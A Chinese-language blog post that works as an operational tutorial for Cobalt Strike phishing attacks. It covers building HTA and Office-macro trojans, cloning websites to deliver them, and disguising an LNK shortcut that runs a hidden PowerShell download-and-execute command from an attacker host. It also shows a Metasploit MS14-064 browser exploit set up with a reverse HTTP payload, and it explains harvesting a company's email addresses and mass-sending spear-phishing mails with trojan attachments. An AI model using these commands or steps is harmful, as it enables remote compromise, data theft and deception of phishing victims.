首页 > 其他分享 >CobaltStrike钓鱼攻击

CobaltStrike钓鱼攻击

时间:2023-01-10 23:55:25浏览次数:47  
标签:064 钓鱼 攻击 生成 windows 木马 CobaltStrike 邮件

木马

  cs可以生成HTA木马、office宏木马以及exe木马

      

HTA木马

  HTA是HTML Application的缩写,直接将HTML保存成HTA的格式,是一个独立的应用软件。HTA虽然用HTML、JS和CSS编写,却比普通网页权限大得多,它具有桌面程序的所有权限。就是一个html应用程序,双击就能运行。HTA木马一般配合网站克隆进行钓鱼攻击。cs可以生成

  Executable 将会在hta文件中内嵌一个PE文件
  Powershell 将会在hta文件中内嵌一段Powershell代码
  VBA 将会在hta文件中内嵌一段VBA代码

      

    

  将生成的evil.hta木马通过文件托管生成url

      

      

      

  选择一个网站进行克隆,上传hta木马

      

      

  目标访问连接后就会弹到百度的网站,并且提示受害者是否下载木马,目标下载运行木马后,就会上线cs

    

  

  

office宏木马

  office钓鱼在无需交互、用户无感知的情况下,执行Office文档中内嵌的一段恶意代码,从远控地址中下载并运行恶意可执行程序,例如远控木马或者勒索病毒等。Cobalt Strike office钓鱼主要方法是生成一段vba代码,然后将代码复制到office套件中,当用户启动office自动运行。

  目标机中需要vba6.msi的宏插件

  生成office宏

      

      

  将文件类型保存为docm类型即可,目标机打开文档即可上线cs

 

钓鱼

钓鱼收集信息

  通过cs系统分析器生成url,诱导用户访问,即可获取目标浏览器信息,目标访问url即可收集到信息,而且会跳转到设定好的网站,目标很难发现

      

      

  

  

 

键盘记录

      

  

    

lnk钓鱼

  lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。lnk钓鱼主要将图标伪装成正常图标,但是目标会执行shell命令。

      

  生成web传递,将生成的命令进行处理,保存为txt文件

      

  

cmd /c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.86.135:80/a'))"

   创建ps1文件,内容为上面的命令,通过powershell运行该文件,会生成test.lnk文件,目标机运行test.lnk文件就会上线cs

OLE溢出远程代码执行(MS14-064)

  Microsoft Windows OLE 远程代码执行漏洞,影响Win95+IE3 - Win10+IE11全版本。通过MSF生成恶意url连接, 配合CS克隆网站进行钓鱼攻击, 然后受害机在CS上线。

  msf配置

  

  

msf6 > use exploit/windows/browser/ms14_064_ole_code_execution
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set srvhost 192.168.86.135
srvhost => 192.168.86.135
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > 
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set srvport 9955
srvport => 9955
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set allowpowershellprompt true
allowpowershellprompt => true
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set lhost 192.168.86.135
lhost => 192.168.86.135
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set lport 9933
lport => 9933
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started HTTP reverse handler on http://192.168.86.135:9933
[*] Using URL: http://192.168.86.135:9955/gwM8C4CIn12fnK
[*] Server started.
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > 

  将生成的链接在cs中进行网站克隆

    

    

  目标访问链接下载运行木马即可上线cs

钓鱼邮件

  利用Cobalt Strike生成钓鱼邮件对企业或者网站的邮箱进行攻击, 钓鱼邮件的内容通常包含Office宏木马附件, 钓鱼网站等等。

  Cobalt Strike钓鱼邮件攻击需确定如下信息:

    • 目标邮箱
    • 邮件模板
    • smtp账号

  创建新的监听器,生成exe木马,接着进行网站克隆,可以是某公司的OA系统、邮件系统等系统。

      

      

      

  在钓鱼前,需要对该公司进行邮件的搜集,而搜集脚本可以在《python安全攻防:渗透测试实战指南》中获取,运行脚本,获取到邮箱

      

  然后制作钓鱼模板,写好邮件内容、主题、目标地址,加入刚刚生成的钓鱼链接,点击发送,在接收方查看邮件内容,点击更多->导出邮件,此时就是导出的邮件模板了。保存到主机中,后面步骤会用到该钓鱼模板。

  在CS中进行配置,配置Mail Server模块,用于批量发送钓鱼邮件,点击Attack->spare phish配置钓鱼模块:Targets: 选择刚刚设置好的目标邮件的txt文件(邮箱+姓名);Template:选择刚刚生成的邮件模板;Attachment:选择生成的附件Beacon 可执行文件;Embed URL:钓鱼邮件的网址;Mail Server设置如下(需要登陆到邮件系统开启POP3/SMTP服务)并生成授权码;SMTP Host: 配置邮件服务器一般都可以在邮件系统中查看;SMTP Port: 设置邮件服务器的端口;username: 邮箱号;Password: 授权码;点击set后,点击send会向目标用户批量发送钓鱼邮件。

      

    

  目标一旦访问就会上线cs

标签:064,钓鱼,攻击,生成,windows,木马,CobaltStrike,邮件
From: https://www.cnblogs.com/CatG0d/p/CoabltStrike_fishEmail.html

相关文章

  • arp攻击原理
    arp攻击原理是通过伪造arp应答,将真的ip与假的mac地址发送给主机。首先需要攻破一台内网的服务器作为攻击主机,在攻击主机发送arp应答1.攻击主机发送arp应答,包......
  • CobaltStrike会话管理
    cobaltstrike派生会话  派生会话可以通过自身增加会话或者在其他的teamserver做备份会话  在原有的监听器的基础上创建新的监听器        派生一个新的......
  • Cobalt Strike 用户驱动攻击
    屏幕截图                         键盘记录   LogKeystrokes记录键盘输入         如果想停止键盘记录进程的话,使用进......
  • MSSQL攻击面探索
    xp_cmdshell开启id=1'EXECsp_configure'showadvancedoptions',1;RECONFIGURE;execSP_CONFIGURE'xp_cmdshell',1;RECONFIGURE;--+命令执行id=1'execm......
  • CobaltStrike使用重定器
    重定器  “重定器”是一个在“cobaltstrike”服务器和目标网络之间的服务器。这个“重定器”的作用是对你团队服务器下的连接,进行任意的连接或返回。(注:即通常说的代理......
  • DenyHos黑白名单防ssh攻击
    DenyHos黑白名单防ssh攻击DenyHosts是Python语言写的一个程序,它会分析sshd的日志文件(/var/log/secure),当发现重复的攻击时就会记录IP到/etc/hosts.deny文件,从而达到自动......
  • Tomcat拒绝服务攻击(CVE-2020-13935)
    漏洞简介CVE-2020-13935ApacheTomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServerPage(JSP)的支持。ApacheTomcat中的WebSo......
  • SSDP反射放大攻击理论原理
    什么是SSDPDDoS攻击?简单服务发现协议(SSDP)攻击是一种基于反射的分布式拒绝服务(DDoS)攻击,它利用通用即插即用(UPnP)网络协议将放大的流量发送给目标受害者,使目......
  • 服务器攻击常见的手段有哪些
    服务器攻击常见的手段有哪些1、SQL注入 使用后台漏洞通过要在数据库中销毁的URL将关键SQL语句引入程序。许多黑客会使用F12或postman等程序集Ajax请求向后台发送非法号......
  • 什么是中间人攻击?
    中间人攻击(通常缩写为MitM或MiM)是一种会话劫持网络攻击。黑客拦截以数字方式共享的信息,通常是作为窃听者或冒充他人。这种类型的攻击极其危险,因为它可能导致多种风险,例......